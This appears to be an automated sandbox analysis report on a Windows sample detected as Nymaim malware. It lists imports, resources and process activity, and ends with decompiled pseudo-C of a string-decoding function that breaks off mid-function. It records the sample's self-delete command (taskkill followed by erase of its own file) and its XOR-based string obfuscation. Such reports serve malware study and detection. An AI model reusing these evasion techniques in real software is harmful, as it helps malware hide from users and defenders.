RT_ICON	0x96710	0x10a8	data	Uzbek	Italy
RT_ICON	0x977b8	0x988	data	Uzbek	Italy
RT_ICON	0x98140	0x468	GLS_BINARY_LSB_FIRST	Uzbek	Italy
RT_ICON	0x98608	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4292543265, next used block 4292805161	Uzbek	Italy
RT_ICON	0x9abb0	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4292739362, next used block 4293001766	Uzbek	Italy
RT_STRING	0x9d5a0	0x16e	data	Uzbek	Italy
RT_STRING	0x9d710	0x4b8	data	Uzbek	Italy
RT_STRING	0x9dbc8	0x23c	data	Uzbek	Italy
RT_STRING	0x9de08	0x114	data	Uzbek	Italy
RT_ACCELERATOR	0x9bfb8	0x58	data	Uzbek	Italy
RT_ACCELERATOR	0x9bf80	0x38	data	Uzbek	Italy
RT_GROUP_CURSOR	0x9c150	0x14	data	Uzbek	Italy
RT_GROUP_CURSOR	0x9d430	0x30	data	Uzbek	Italy
RT_GROUP_ICON	0x9bc58	0x22	data	Uzbek	Italy
RT_GROUP_ICON	0x985a8	0x5a	data	Uzbek	Italy
RT_GROUP_ICON	0x951e8	0x4c	data	Uzbek	Italy
RT_VERSION	0x9d460	0x140	MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79	Uzbek	Italy

Imports

DLL

Import

KERNEL32.dll

GetNamedPipeHandleStateW, CreateIoCompletionPort, FillConsoleOutputCharacterW, SetThreadAffinityMask, TerminateProcess, GetCurrentProcessId, GetVersionExA, EnumDateFormatsExW, FindNextFileW, CopyFileExA, BuildCommDCBAndTimeoutsW, DebugSetProcessKillOnExit, WriteProfileStringW, WritePrivateProfileStructA, FindFirstChangeNotificationA, MapViewOfFileEx, CreateTimerQueue, FindNextVolumeMountPointA, SetVolumeMountPointW, GetWriteWatch, ReadConsoleInputA, SetComputerNameExA, SystemTimeToTzSpecificLocalTime, GetSystemDirectoryA, GetDriveTypeW, BuildCommDCBAndTimeoutsA, LoadLibraryA, GlobalAlloc, VerifyVersionInfoW, GetBinaryTypeA, InterlockedExchange, InterlockedDecrement, FormatMessageW, SetDllDirectoryA, GetNamedPipeHandleStateA, WritePrivateProfileStringA, GetConsoleAliasesLengthW, GetProcessHeap, OpenWaitableTimerW, UnlockFile, InterlockedIncrement, GetStartupInfoW, GetSystemWow64DirectoryW, SetLastError, GetConsoleAliasExesW, ContinueDebugEvent, EndUpdateResourceA, GetLastError, FlushConsoleInputBuffer, SetDefaultCommConfigW, VirtualFree, GlobalUnfix, GetSystemWindowsDirectoryA, CopyFileA, TerminateThread, GetOEMCP, EnterCriticalSection, HeapUnlock, GetMailslotInfo, CreateActCtxA, GetConsoleAliasW, _lwrite, CreateNamedPipeA, SetSystemTimeAdjustment, DefineDosDeviceW, GetAtomNameA, SetConsoleScreenBufferSize, EnumResourceTypesA, lstrlenA, LoadLibraryW, MoveFileW, WriteConsoleA, VirtualProtect, GetModuleHandleW, ReadConsoleOutputW, GetThreadContext, BuildCommDCBW, AddRefActCtx, WritePrivateProfileStringW, GetFileAttributesW, CopyFileW, GetVolumePathNameW, GetCommMask, CloseHandle, EnumDateFormatsExA, FindActCtxSectionStringA, GetNamedPipeInfo, AttachConsole, GlobalGetAtomNameW, SetComputerNameA, GetConsoleAliasesW, WriteConsoleInputW, CreateMailslotW, SetLocalTime, EnumSystemLocalesA, CallNamedPipeA, GetConsoleAliasExesLengthW, FindActCtxSectionStringW, GetPrivateProfileIntW, GetModuleHandleExW, GetStringTypeA, GetTickCount, OpenWaitableTimerA, GlobalWire, GetCompressedFileSizeW, SetThreadPriority, MapUserPhysicalPages, WriteConsoleOutputCharacterA, EnumDateFormatsA, TerminateJobObject, CreateFileW, GetDateFormatA, FindAtomA, FindNextVolumeA, Sleep, InitializeCriticalSection, DeleteCriticalSection, LeaveCriticalSection, RaiseException, RtlUnwind, WideCharToMultiByte, HeapValidate, IsBadReadPtr, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameW, GetCurrentProcess, IsDebuggerPresent, GetProcAddress, TlsGetValue, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, GetACP, GetCPInfo, IsValidCodePage, SetStdHandle, GetFileType, WriteFile, GetConsoleCP, GetConsoleMode, SetHandleCount, GetStdHandle, GetStartupInfoA, QueryPerformanceCounter, GetSystemTimeAsFileTime, ExitProcess, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, HeapDestroy, HeapCreate, HeapFree, GetModuleFileNameA, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, FlushFileBuffers, DebugBreak, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, InitializeCriticalSectionAndSpinCount, MultiByteToWideChar, GetStringTypeW, GetLocaleInfoA, LCMapStringA, LCMapStringW, GetConsoleOutputCP, SetFilePointer, CreateFileA, ReadFile

ADVAPI32.dll

ImpersonateSelf

Version Infos

Description	Data
Translations	0x0208 0x02be

Possible Origin

Language of compilation system	Country where language is spoken	Map
Uzbek	Italy

Network Behavior

⊘No network behavior found

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: qjrOWCCE58.exePID: 1592, Parent PID: 3772

General

Target ID:	0
Start time:	05:40:06
Start date:	05/05/2022
Path:	C:\Users\user\Desktop\qjrOWCCE58.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\qjrOWCCE58.exe"
Imagebase:	0x400000
File size:	382976 bytes
MD5 hash:	732132623989CAAE367E0878298B7E9B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.269341375.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.283327894.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.262759789.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.253715249.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.280137430.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.253175312.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.302456596.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.291073585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.283828611.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.263480015.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.284150109.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.301360286.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.302642354.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000003.250452760.0000000000860000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.254142123.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.292136739.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.301881203.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.269598460.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.262441622.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.263212749.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.309005504.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.309602192.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.309769483.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.291503648.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.270183524.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.292619266.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.252534472.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.269963050.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.309168636.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 4856, Parent PID: 1592

General

Target ID:	2
Start time:	05:40:10
Start date:	05/05/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 656
Imagebase:	0x60000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 4412, Parent PID: 1592

General

Target ID:	4
Start time:	05:40:15
Start date:	05/05/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 772
Imagebase:	0x60000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 3152, Parent PID: 1592

General

Target ID:	8
Start time:	05:40:18
Start date:	05/05/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 796
Imagebase:	0x60000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 4228, Parent PID: 1592

General

Target ID:	11
Start time:	05:40:25
Start date:	05/05/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 628
Imagebase:	0x60000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 4856, Parent PID: 1592

General

Target ID:	15
Start time:	05:40:28
Start date:	05/05/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 900
Imagebase:	0x60000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 6220, Parent PID: 1592

General

Target ID:	22
Start time:	05:40:33
Start date:	05/05/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 908
Imagebase:	0x60000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 6408, Parent PID: 1592

General

Target ID:	25
Start time:	05:40:36
Start date:	05/05/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 916
Imagebase:	0x60000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6492, Parent PID: 1592

General

Target ID:	26
Start time:	05:40:40
Start date:	05/05/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c taskkill /im "qjrOWCCE58.exe" /f & erase "C:\Users\user\Desktop\qjrOWCCE58.exe" & exit
Imagebase:	0xc20000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6568, Parent PID: 6492

General

Target ID:	27
Start time:	05:40:42
Start date:	05/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: taskkill.exePID: 6612, Parent PID: 6492

General

Target ID:	29
Start time:	05:40:43
Start date:	05/05/2022
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /im "qjrOWCCE58.exe" /f
Imagebase:	0xc0000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: qjrOWCCE58.exePID: 1592, Parent PID: 3772COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	23.1%
Signature Coverage:	16.5%
Total number of Nodes:	389
Total number of Limit Nodes:	8

Executed Functions

Function 00407FB0 Relevance: 16.3, APIs: 7, Strings: 2, Instructions: 537
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00407FB0(signed int __edi, void* __esi) {
				intOrPtr _v8;
				signed char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed char _v44;
				signed char _v48;
				signed int _v52;
				signed char _v56;
				signed int _v60;
				signed char _v76;
				signed char _v80;
				signed char _v84;
				signed char _v100;
				signed char _v124;
				signed char _v128;
				signed char _v132;
				signed char _v164;
				char _v172;
				intOrPtr _v176;
				intOrPtr _v192;
				signed int _v196;
				signed int* _v208;
				signed int* _v224;
				signed int* _v240;
				char _v252;
				char _v268;
				char _v444;
				char _v445;
				signed char _v452;
				signed char _v456;
				signed int _v472;
				signed int _v476;
				signed char _v480;
				signed int _v496;
				char _v520;
				signed int _v560;
				intOrPtr _v568;
				void* __ebx;
				void* __ebp;
				signed int _t181;
				signed int _t182;
				void* _t184;
				intOrPtr _t197;
				void* _t201;
				signed int _t208;
				intOrPtr _t211;
				intOrPtr* _t218;
				void* _t223;
				intOrPtr _t224;
				signed char _t225;
				signed char _t226;
				signed char _t244;
				signed char _t246;
				signed char _t249;
				signed int _t253;
				signed int _t257;
				intOrPtr _t261;
				signed char _t262;
				signed char _t263;
				char _t265;
				intOrPtr _t277;
				signed char _t278;
				signed char _t279;
				signed char* _t281;
				signed int _t283;
				signed char _t293;
				intOrPtr* _t295;
				signed int _t297;
				void* _t302;
				intOrPtr _t303;
				void* _t305;
				void* _t307;
				signed int _t309;
				void* _t319;
				signed char* _t326;
				void* _t339;
				signed char _t340;
				signed char* _t341;
				signed char* _t345;
				signed char _t349;
				signed char* _t356;
				signed char _t358;
				signed char _t359;
				void* _t360;
				signed char* _t361;
				signed char* _t363;
				signed char _t364;
				void* _t365;
				void* _t367;
				void* _t370;
				signed int _t371;
				void* _t372;
				signed int _t375;
				signed int _t376;
				void* _t379;
				signed int _t382;
				void* _t383;
				void* _t384;
				signed int _t385;
				void* _t390;
				void* _t391;
				void* _t398;

				_t366 = __edi;
				_t305 = _t379;
				_t382 = (_t379 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t305 + 4));
				_t375 = _t382;
				_push(0xffffffff);
				_push(0x42b0e0);
				_push( *[fs:0x0]);
				_push(_t305);
				_t383 = _t382 - 0x1f0;
				_t181 =  *0x43b054; // 0x41d6575c
				_t182 = _t181 ^ _t375;
				_v32 = _t182;
				_push(__esi);
				_push(__edi);
				_push(_t182);
				 *[fs:0x0] =  &_v24;
				_t353 =  *(_t305 + 0x10);
				_t309 =  *(_t305 + 0x10);
				_v40 = 0;
				_v76 = 0;
				_v60 = 0;
				_v56 = 0xf;
				_t370 = _t309 + 1;
				do {
					_t184 =  *_t309;
					_t309 = _t309 + 1;
					_t400 = _t184;
				} while (_t184 != 0);
				_push(_t309 - _t370);
				E00402030( &_v76, _t353);
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				E0040F2F0(__edi,  &_v268, 0, 0xa8);
				_t384 = _t383 + 8;
				_v268 = 0x437cdc;
				_v164 = 0;
				asm("xorps xmm0, xmm0");
				_v132 = 0;
				_v128 = 0;
				_v124 = 0;
				_v172 = 0x437c98;
				_v176 = 0x48;
				asm("movlpd [ebp-0xf8], xmm0");
				E0040AD00( &_v172, _t353, _t400,  &_v252);
				_t26 = _v268 + 4; // 0x60
				 *((intOrPtr*)(_t375 +  *_t26 - 0x100)) = 0x437cf0;
				_t30 = _v268 + 4; // 0x4383a4
				_t31 =  *_t30 - 0x60; // 0x438344
				 *((intOrPtr*)(_t375 +  *_t30 - 0x104)) = _t31;
				_t314 =  &_v252;
				E0040AC30(_t314, _t400);
				_t371 = _v60;
				_t196 =  >=  ? _v76 :  &_v76;
				_v40 =  >=  ? _v76 :  &_v76;
				_t197 = 2;
				_v252 = 0x437c30;
				if(_t371 > 0x7fffffff) {
					E0040C7E9(__eflags);
					goto L68;
				} else {
					if(_t371 == 0) {
						_v196 = 0;
						L11:
						_push(_t314);
						_t354 =  &_v100;
						_v192 = _t197;
						_v100 = 0;
						_v84 = 0;
						_v80 = 0xf;
						_t218 = E0040BF00( &_v268,  &_v100);
						_t384 = _t384 + 4;
						if(( *( *((intOrPtr*)( *_t218 + 4)) + _t218 + 0xc) & 0x00000006) == 0) {
							do {
								_t293 = _v48;
								_push( &_v100);
								if(_t293 == _v44) {
									_push(_t293);
									_t349 =  &_v52;
									E0040B820(_t305, _t349, _t366, _t371);
								} else {
									_t349 = _t293;
									E0040A490(_t305, _t349, _t354, _t366);
									_v48 = _v48 + 0x18;
								}
								_push(_t349);
								_t354 =  &_v100;
								_t295 = E0040BF00( &_v268,  &_v100);
								_t384 = _t384 + 4;
							} while (( *( *((intOrPtr*)( *_t295 + 4)) + _t295 + 0xc) & 0x00000006) == 0);
						}
						_t314 = _v48 - _v52;
						_t353 = 0x2aaaaaab * (_v48 - _v52) >> 0x20 >> 2;
						_t223 = (0x2aaaaaab * (_v48 - _v52) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v48 - _v52) >> 0x20 >> 2);
						if(_t223 == 0) {
							goto L69;
						} else {
							_t366 =  *[fs:0x2c];
							if(_t223 != 1) {
								L31:
								_t366 =  *_t366;
								_t224 =  *0x43cf18; // 0x0
								_v40 = 0x2e45464d;
								if(_t224 >  *((intOrPtr*)(_t366 + 4))) {
									E0040D738(_t224, 0x43cf18);
									_t384 = _t384 + 4;
									_t419 =  *0x43cf18 - 0xffffffff;
									if( *0x43cf18 == 0xffffffff) {
										 *0x43cda8 = _v40;
										E0040DA4A(_t314, _t419, 0x42b8b0);
										E0040D6EE(0x43cf18);
										_t384 = _t384 + 8;
									}
								}
								_t225 =  *0x43cdab; // 0x0
								if(_t225 != 0) {
									 *0x43cda8 =  *0x43cda8 ^ 0x0000002e;
									 *0x43cda9 =  *0x43cda9 ^ 0x0000002e;
									 *0x43cdaa =  *0x43cdaa ^ 0x0000002e;
									 *0x43cdab = _t225 ^ 0x0000002e;
								}
								_t326 = 0x43cda8;
								_v496 = 0;
								_v480 = 0;
								_v476 = 0xf;
								_t106 =  &(_t326[1]); // 0x43cda9
								_t356 = _t106;
								do {
									_t226 =  *_t326;
									_t326 =  &(_t326[1]);
								} while (_t226 != 0);
								_push(_t326 - _t356);
								E00402030( &_v496, 0x43cda8);
								_t371 = _v52;
								_t314 = _t371;
								_v40 = 5;
								if(E0040B260(_t371,  &_v496) != 0) {
									L48:
									__eflags = _v40 & 0x00000002;
									_v445 = 1;
									if(__eflags == 0) {
										goto L53;
									} else {
										goto L49;
									}
								} else {
									_t261 =  *0x43cf60; // 0x0
									_v40 = 0x45464d01;
									_v445 = 0x2e;
									if(_t261 >  *((intOrPtr*)(_t366 + 4))) {
										E0040D738(_t261, 0x43cf60);
										_t384 = _t384 + 4;
										_t425 =  *0x43cf60 - 0xffffffff;
										if( *0x43cf60 == 0xffffffff) {
											 *0x43cdbc = _v40;
											 *0x43cdc0 = _v445;
											E0040DA4A(_t314, _t425, 0x42b890);
											E0040D6EE(0x43cf60);
											_t384 = _t384 + 8;
										}
									}
									_t262 =  *0x43cdc0; // 0x0
									if(_t262 != 0) {
										 *0x43cdbc =  *0x43cdbc ^ 0x0000002e;
										 *0x43cdbd =  *0x43cdbd ^ 0x0000002e;
										 *0x43cdbe =  *0x43cdbe ^ 0x0000002e;
										 *0x43cdbf =  *0x43cdbf ^ 0x0000002e;
										 *0x43cdc0 = _t262 ^ 0x0000002e;
									}
									_t341 = 0x43cdbc;
									_v472 = 0;
									_v456 = 0;
									_v452 = 0xf;
									_t119 =  &(_t341[1]); // 0x43cdbd
									_t361 = _t119;
									do {
										_t263 =  *_t341;
										_t341 =  &(_t341[1]);
									} while (_t263 != 0);
									_push(_t341 - _t361);
									E00402030( &_v472, 0x43cdbc);
									_t371 = _v52;
									_t314 = _t371;
									_v40 = 7;
									_t265 = E0040B260(_t371,  &_v472);
									if(_t265 != 0) {
										goto L48;
									} else {
										_v445 = _t265;
										L49:
										_t359 = _v452;
										if(_t359 < 0x10) {
											L53:
											_t353 = _v476;
											if(_t353 < 0x10) {
												L57:
												if(_v445 != 0) {
													goto L70;
												} else {
													_t390 = _t384 - 0x18;
													_t138 = _t371 + 0x18; // 0x18
													E0040A490(_t305, _t390, _t353, _t366, _t138);
													_t391 = _t390 - 0x18;
													E0040A490(_t305, _t391, _t353, _t366, _t371);
													E00405840();
													_t358 = _v80;
													_t385 = _t391 + 0x30;
													if(_t358 < 0x10) {
														L62:
														_t143 = _v268 + 4; // 0x4383a4
														 *((intOrPtr*)(_t375 +  *_t143 - 0x100)) = 0x437cf0;
														_t147 = _v268 + 4; // 0x4383a4
														_t148 =  *_t147 - 0x60; // 0x438344
														 *((intOrPtr*)(_t375 +  *_t147 - 0x104)) = _t148;
														E00408D10(_t305,  &_v252, _t371);
														_t153 = _v268 + 4; // 0x4383a4
														 *((intOrPtr*)(_t375 +  *_t153 - 0x100)) = 0x437c98;
														_t157 = _v268 + 4; // 0x33323130
														_t158 =  *_t157 - 0x18; // 0x33323118
														 *((intOrPtr*)(_t375 +  *_t157 - 0x104)) = _t158;
														_v16 = 0;
														_v172 = 0x437bd0;
														E0040CCC3( &_v172);
														_t385 = _t385 + 4;
														E0040A160(_t305,  &_v52, _t366);
														_t244 = _v56;
														if(_t244 < 0x10) {
															L66:
															 *[fs:0x0] = _v24;
															_pop(_t367);
															_pop(_t372);
															return E0040D3AF(_t244, _t305, _v32 ^ _t375, _t358, _t367, _t372);
														} else {
															_t358 = _v76;
															_t167 = _t244 + 1; // 0x11
															_t339 = _t167;
															_t246 = _t358;
															if(_t339 < 0x1000) {
																L65:
																_push(_t339);
																_t244 = E0040D5EF(_t358);
																goto L66;
															} else {
																_t353 =  *(_t358 - 4);
																_t314 = _t339 + 0x23;
																if(_t246 -  *(_t358 - 4) + 0xfffffffc > 0x1f) {
																	goto L71;
																} else {
																	goto L65;
																}
															}
														}
													} else {
														_t340 = _v100;
														_t358 = _t358 + 1;
														_t249 = _t340;
														if(_t358 < 0x1000) {
															L61:
															_push(_t358);
															E0040D5EF(_t340);
															_t385 = _t385 + 8;
															goto L62;
														} else {
															_t314 =  *(_t340 - 4);
															_t353 = _t358 + 0x23;
															if(_t249 -  *(_t340 - 4) + 0xfffffffc > 0x1f) {
																goto L71;
															} else {
																goto L61;
															}
														}
													}
												}
											} else {
												_t314 = _v496;
												_t353 = _t353 + 1;
												_t253 = _t314;
												if(_t353 < 0x1000) {
													L56:
													_push(_t353);
													E0040D5EF(_t314);
													_t371 = _v52;
													_t384 = _t384 + 8;
													goto L57;
												} else {
													_t314 =  *(_t314 - 4);
													_t353 = _t353 + 0x23;
													if(_t253 - _t314 + 0xfffffffc > 0x1f) {
														goto L71;
													} else {
														goto L56;
													}
												}
											}
										} else {
											_t314 = _v472;
											_t360 = _t359 + 1;
											_t257 = _t314;
											if(_t360 < 0x1000) {
												L52:
												_push(_t360);
												E0040D5EF(_t314);
												_t371 = _v52;
												_t384 = _t384 + 8;
												goto L53;
											} else {
												_t314 =  *(_t314 - 4);
												_t353 = _t360 + 0x23;
												if(_t257 - _t314 + 0xfffffffc > 0x1f) {
													goto L71;
												} else {
													goto L52;
												}
											}
										}
									}
								}
							} else {
								_t344 =  *_t366;
								_t277 =  *0x43cdac; // 0x0
								_v40 = 0x7b7d6160;
								_v36 = 0x2e6c;
								if(_t277 >  *((intOrPtr*)( *_t366 + 4))) {
									E0040D738(_t277, 0x43cdac);
									_t384 = _t384 + 4;
									_t413 =  *0x43cdac - 0xffffffff;
									if( *0x43cdac == 0xffffffff) {
										 *0x43cf20 = _v40;
										 *0x43cf24 = _v36;
										E0040DA4A(_t344, _t413, E0042B8C0);
										E0040D6EE(0x43cdac);
										_t384 = _t384 + 8;
									}
								}
								_t278 =  *0x43cf25; // 0x0
								if(_t278 != 0) {
									 *0x43cf20 =  *0x43cf20 ^ 0x0000002e;
									 *0x43cf21 =  *0x43cf21 ^ 0x0000002e;
									 *0x43cf22 =  *0x43cf22 ^ 0x0000002e;
									 *0x43cf23 =  *0x43cf23 ^ 0x0000002e;
									 *0x43cf24 =  *0x43cf24 ^ 0x0000002e;
									 *0x43cf25 = _t278 ^ 0x0000002e;
								}
								_t345 = 0x43cf20;
								_v472 = 0;
								_v456 = 0;
								_v452 = 0xf;
								_t89 =  &(_t345[1]); // 0x43cf21
								_t363 = _t89;
								do {
									_t279 =  *_t345;
									_t345 =  &(_t345[1]);
								} while (_t279 != 0);
								_push(_t345 - _t363);
								_t314 =  &_v472;
								E00402030( &_v472, 0x43cf20);
								_t281 = _v48;
								if(_t281 == _v44) {
									_push( &_v472);
									_push(_t281);
									_t314 =  &_v52;
									E0040B640(_t305,  &_v52, _t366, _t371);
									_t364 = _v452;
									__eflags = _t364 - 0x10;
									if(_t364 < 0x10) {
										goto L31;
									} else {
										_t314 = _v472;
										_t365 = _t364 + 1;
										_t283 = _t314;
										__eflags = _t365 - 0x1000;
										if(_t365 < 0x1000) {
											L30:
											_push(_t365);
											E0040D5EF(_t314);
